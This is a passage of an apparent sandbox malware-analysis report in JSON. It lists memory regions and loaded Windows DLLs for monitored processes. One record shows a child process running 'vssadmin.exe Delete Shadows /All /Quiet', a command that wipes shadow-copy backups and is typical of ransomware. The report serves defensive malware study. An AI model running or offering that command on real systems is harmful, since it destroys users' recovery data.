"region", "version": 1 }, "end_va": 6651903, "entry_point": 0, "filename": null, "id": "region_5027", "name": "pagefile_0x00000000004d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5046272, "timestamp": "00:01:37.856", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1987969024, "type": "region", "version": 1 }, "end_va": 1988362239, "entry_point": 1988040079, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_5028", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1987969024, "timestamp": "00:01:37.856", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1998520320, "type": "region", "version": 1 }, "end_va": 1999355903, "entry_point": 1998526091, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_5029", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1998520320, "timestamp": "00:01:37.857", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 225279, "entry_point": 0, "filename": null, "id": "region_5032", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:38.012", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 466943, "entry_point": 0, "filename": null, "id": "region_5033", "name": "pagefile_0x0000000000070000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 458752, "timestamp": "00:01:38.012", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 524288, "type": "region", "version": 1 }, "end_va": 540671, "entry_point": 524288, "filename": "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui", "id": "region_5034", "name": "taskkill.exe.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui", "region_type": "memory_mapped_file", "start_va": 524288, "timestamp": "00:01:38.012", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 593919, "entry_point": 0, "filename": null, "id": "region_5035", "name": "private_0x0000000000090000", "norm_filename": null, "region_type": "private_memory", "start_va": 589824, "timestamp": "00:01:38.014", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 655360, "type": "region", "version": 1 }, "end_va": 659455, "entry_point": 0, "filename": null, "id": "region_5036", "name": "private_0x00000000000a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 655360, "timestamp": "00:01:38.014", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 720896, "type": "region", "version": 1 }, "end_va": 724991, "entry_point": 0, "filename": null, "id": "region_5037", "name": "pagefile_0x00000000000b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 720896, "timestamp": "00:01:38.014", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 3997696, "type": "region", "version": 1 }, "end_va": 4784127, "entry_point": 3997696, "filename": "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui", "id": "region_5038", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 3997696, "timestamp": "00:01:38.014", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 6684672, "type": "region", "version": 1 }, "end_va": 8261631, "entry_point": 0, "filename": null, "id": "region_5039", "name": "pagefile_0x0000000000660000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6684672, "timestamp": "00:01:38.014", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 8454144, "type": "region", "version": 1 }, "end_va": 8716287, "entry_point": 0, "filename": null, "id": "region_5040", "name": "private_0x0000000000810000", "norm_filename": null, "region_type": "private_memory", "start_va": 8454144, "timestamp": "00:01:38.014", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 9502720, "type": "region", "version": 1 }, "end_va": 9764863, "entry_point": 0, "filename": null, "id": "region_5041", "name": "private_0x0000000000910000", "norm_filename": null, "region_type": "private_memory", "start_va": 9502720, "timestamp": "00:01:38.014", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 10485760, "type": "region", "version": 1 }, "end_va": 10747903, "entry_point": 0, "filename": null, "id": "region_5042", "name": "private_0x0000000000a00000", "norm_filename": null, "region_type": "private_memory", "start_va": 10485760, "timestamp": "00:01:38.014", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 14221312, "type": "region", "version": 1 }, "end_va": 35192831, "entry_point": 0, "filename": null, "id": "region_5043", "name": "pagefile_0x0000000000d90000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 14221312, "timestamp": "00:01:38.015", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1984495616, "type": "region", "version": 1 }, "end_va": 1985032191, "entry_point": 1984504786, "filename": "\\Windows\\SysWOW64\\clbcatq.dll", "id": "region_5044", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\syswow64\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1984495616, "timestamp": "00:01:38.015", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_5045", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:01:38.015", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1314815, "entry_point": 0, "filename": null, "id": "region_5046", "name": "pagefile_0x0000000000140000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1310720, "timestamp": "00:01:38.020", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1958543360, "type": "region", "version": 1 }, "end_va": 1958920191, "entry_point": 1958685512, "filename": "\\Windows\\SysWOW64\\wbemcomn.dll", "id": "region_5047", "name": "wbemcomn.dll", "norm_filename": "c:\\windows\\syswow64\\wbemcomn.dll", "region_type": "memory_mapped_file", "start_va": 1958543360, "timestamp": "00:01:38.020", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1958936576, "type": "region", "version": 1 }, "end_va": 1958977535, "entry_point": 1958941850, "filename": "\\Windows\\SysWOW64\\wbem\\wbemprox.dll", "id": "region_5048", "name": "wbemprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemprox.dll", "region_type": "memory_mapped_file", "start_va": 1958936576, "timestamp": "00:01:38.020", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 10747904, "type": "region", "version": 1 }, "end_va": 11796479, "entry_point": 0, "filename": null, "id": "region_5049", "name": "private_0x0000000000a40000", "norm_filename": null, "region_type": "private_memory", "start_va": 10747904, "timestamp": "00:01:38.027", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 11796480, "type": "region", "version": 1 }, "end_va": 12058623, "entry_point": 0, "filename": null, "id": "region_5050", "name": "private_0x0000000000b40000", "norm_filename": null, "region_type": "private_memory", "start_va": 11796480, "timestamp": "00:01:38.027", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 167936, "start_va": 1958346752, "type": "region", "version": 1 }, "end_va": 1958514687, "entry_point": 1958374169, "filename": "\\Windows\\SysWOW64\\winsta.dll", "id": "region_5051", "name": "winsta.dll", "norm_filename": "c:\\windows\\syswow64\\winsta.dll", "region_type": "memory_mapped_file", "start_va": 1958346752, "timestamp": "00:01:38.027", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1638399, "entry_point": 0, "filename": null, "id": "region_5052", "name": "private_0x0000000000150000", "norm_filename": null, "region_type": "private_memory", "start_va": 1376256, "timestamp": "00:01:38.039", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 10223616, "type": "region", "version": 1 }, "end_va": 10485759, "entry_point": 0, "filename": null, "id": "region_5053", "name": "private_0x00000000009c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 10223616, "timestamp": "00:01:38.039", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 35192832, "type": "region", "version": 1 }, "end_va": 38137855, "entry_point": 35192832, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_5054", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 35192832, "timestamp": "00:01:38.039", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1950744576, "type": "region", "version": 1 }, "end_va": 1950986239, "entry_point": 1950749325, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_5055", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1950744576, "timestamp": "00:01:38.041", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1956511744, "type": "region", "version": 1 }, "end_va": 1956601855, "entry_point": 1956523459, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_5056", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1956511744, "timestamp": "00:01:38.042", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130530304, "type": "region", "version": 1 }, "end_va": 2130542591, "entry_point": 0, "filename": null, "id": "region_5057", "name": "private_0x000000007efd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130530304, "timestamp": "00:01:38.042", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 1956446208, "type": "region", "version": 1 }, "end_va": 1956503551, "entry_point": 1956450869, "filename": "\\Windows\\SysWOW64\\RpcRtRemote.dll", "id": "region_5058", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 1956446208, "timestamp": "00:01:38.078", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 8716288, "type": "region", "version": 1 }, "end_va": 8978431, "entry_point": 0, "filename": null, "id": "region_5059", "name": "private_0x0000000000850000", "norm_filename": null, "region_type": "private_memory", "start_va": 8716288, "timestamp": "00:01:38.088", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 12124160, "type": "region", "version": 1 }, "end_va": 12386303, "entry_point": 0, "filename": null, "id": "region_5060", "name": "private_0x0000000000b90000", "norm_filename": null, "region_type": "private_memory", "start_va": 12124160, "timestamp": "00:01:38.088", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 12386304, "type": "region", "version": 1 }, "end_va": 12648447, "entry_point": 0, "filename": null, "id": "region_5061", "name": "private_0x0000000000bd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 12386304, "timestamp": "00:01:38.088", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 38141952, "type": "region", "version": 1 }, "end_va": 38404095, "entry_point": 0, "filename": null, "id": "region_5062", "name": "private_0x0000000002460000", "norm_filename": null, "region_type": "private_memory", "start_va": 38141952, "timestamp": "00:01:38.088", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1958281216, "type": "region", "version": 1 }, "end_va": 1958342655, "entry_point": 1958289824, "filename": "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll", "id": "region_5063", "name": "wbemsvc.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemsvc.dll", "region_type": "memory_mapped_file", "start_va": 1958281216, "timestamp": "00:01:38.088", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130354176, "type": "region", "version": 1 }, "end_va": 2130366463, "entry_point": 0, "filename": null, "id": "region_5064", "name": "private_0x000000007efaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130354176, "timestamp": "00:01:38.088", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130366464, "type": "region", "version": 1 }, "end_va": 2130378751, "entry_point": 0, "filename": null, "id": "region_5065", "name": "private_0x000000007efad000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130366464, "timestamp": "00:01:38.088", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 614400, "start_va": 1784086528, "type": "region", "version": 1 }, "end_va": 1784700927, "entry_point": 1784215737, "filename": "\\Windows\\SysWOW64\\wbem\\fastprox.dll", "id": "region_5066", "name": "fastprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\fastprox.dll", "region_type": "memory_mapped_file", "start_va": 1784086528, "timestamp": "00:01:38.095", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 1958150144, "type": "region", "version": 1 }, "end_va": 1958248447, "entry_point": 1958155061, "filename": "\\Windows\\SysWOW64\\ntdsapi.dll", "id": "region_5067", "name": "ntdsapi.dll", "norm_filename": "c:\\windows\\syswow64\\ntdsapi.dll", "region_type": "memory_mapped_file", "start_va": 1958150144, "timestamp": "00:01:38.096", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "vssadmin.exe Delete Shadows /All /Quiet", "filename": "c:\\windows\\syswow64\\vssadmin.exe", "id": "proc_44", "image_name": "vssadmin.exe", "monitor_reason": "child_process", "monitored_id": 44, "origin_monitor_id": 10, "ref_parent_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_5068", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:38.373", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_5069", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:38.373", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_5070", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:38.373", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_5071", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:01:38.388", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_5072", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:01:38.388", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 2031615, "entry_point": 0, "filename": null, "id": "region_5073", "name": "private_0x00000000001b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1769472, "timestamp": "00:01:38.388", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2359296, "type": "region", "version": 1 }, "end_va": 2621439, "entry_point": 0, "filename": null, "id": "region_5074", "name": "private_0x0000000000240000", "norm_filename": null, "region_type": "private_memory", "start_va": 2359296, "timestamp": "00:01:38.388", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 10223616, "type": "region", "version": 1 }, "end_va": 10350591, "entry_point": 10223616, "filename": "\\Windows\\SysWOW64\\vssadmin.exe", "id": "region_5075", "name": "vssadmin.exe", "norm_filename": "c:\\windows\\syswow64\\vssadmin.exe", "region_type": "memory_mapped_file", "start_va": 10223616, "timestamp": "00:01:38.388", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2003566592, "type": "region", "version": 1 }, "end_va": 2005307391, "entry_point": 2003566592, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_5076", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2003566592, "timestamp": "00:01:38.394", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2005532672, "type": "region", "version": 1 }, "end_va": 2007105535, "entry_point": 2005532672, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_5077", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2005532672, "timestamp": "00:01:38.395", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_5078", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:01:38.395", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_5079", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:01:38.395", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_5080", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:01:38.395", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_5081", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:01:38.395", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_5082", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:38.395", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_5083", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:38.395", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_5084", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:01:38.395", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 3604480, "type": "region", "version": 1 }, "end_va": 4128767, "entry_point": 0, "filename": null, "id": "region_5085", "name": "private_0x0000000000370000", "norm_filename": null, "region_type": "private_memory", "start_va": 3604480, "timestamp": "00:01:38.459", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1945960448, "type": "region", "version": 1 }, "end_va": 1945993215, "entry_point": 1945968888, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_5086", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1945960448, "timestamp": "00:01:38.459", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1946025984, "type": "region", "version": 1 }, "end_va": 1946402815, "entry_point": 1946285976, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_5087", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1946025984, "timestamp": "00:01:38.460", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1946419200, "type": "region", "version": 1 }, "end_va": 1946677247, "entry_point": 1946607224, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_5088", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1946419200, "timestamp": "00:01:38.460", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2001338368, "type": "region", "version": 1 }, "end_va": 2002362367, "entry_point": 0, "filename": null, "id": "region_5089", "name": "private_0x00000000774a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2001338368, "timestamp": "00:01:38.461", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2002386944, "type": "region", "version": 1 }, "end_va": 2003562495, "entry_point": 0, "filename": null, "id": "region_5090", "name": "private_0x00000000775a0000", 